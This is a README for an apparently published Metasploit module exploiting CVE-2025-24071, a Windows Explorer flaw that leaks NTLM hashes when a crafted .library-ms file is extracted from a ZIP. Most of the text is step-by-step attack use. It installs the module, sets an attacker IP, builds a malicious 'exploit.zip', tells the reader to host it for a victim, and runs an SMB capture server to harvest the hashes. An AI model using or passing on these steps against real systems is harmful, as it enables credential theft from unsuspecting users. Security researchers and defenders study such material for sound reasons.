metasploit module for the CVE-2025-24071## CVE-2025-24071: NTLM Hash Leak via .library-ms File (Metasploit Module)
This repository contains a **Metasploit module** to exploit CVE-2025-24071, a vulnerability in Windows Explorer that leaks NTLM hashes when a malicious `.library-ms` file is extracted from a ZIP archive.
Developed by: **FOLKS-IWD**
---
## **Overview**
The vulnerability occurs when a user extracts a ZIP archive containing a specially crafted `.library-ms` file. Windows Explorer automatically initiates an SMB authentication request to a remote server specified in the file, leaking the user's NTLM hash without any user interaction.
This Metasploit module:
1. Generates a malicious `.library-ms` file.
2. Packs it into a ZIP archive.
3. Integrates with Metasploit's SMB capture functionality to collect NTLM hashes.
---
## **Installation**
1. Clone the repository:
```bash
git clone https://github.com/FOLKS-IWD/CVE-2025-24071-msfvenom.git
cd CVE-2025-24071-msfvenom
```
2. Copy the module to your Metasploit modules directory:
```bash
cp ntlm_hash_leak.rb ~/.msf4/modules/auxiliary/server/
```
## **Usage**
1. Load the module:
```bash
use auxiliary/server/ntlm_hash_leak
```
2. Set the required options:
```bash
set ATTACKER_IP 192.168.1.162 # Replace with your IP address
set FILENAME exploit.zip # Name of the malicious ZIP file
set LIBRARY_NAME malicious.library-ms # Name of the .library-ms file
set SHARE_NAME shared # SMB share name
```
3. Run the module :
```bash
run
```
4. The module will generate a malicious ZIP file (exploit.zip). Host this file for the victim to download and extract.
5. Use Metasploit's SMB capture module to collect NTLM hashes:
```bash
use auxiliary/server/capture/smb
set SRVHOST 192.168.1.162 # Same as ATTACKER_IP
run
```
[4.0K] /data/pocs/8c54efc3c261a903d6e4d55b17ca07110d0aa34f
├── [2.9K] ntlm_hash_leak.rb
└── [1.9K] README.md
0 directories, 2 files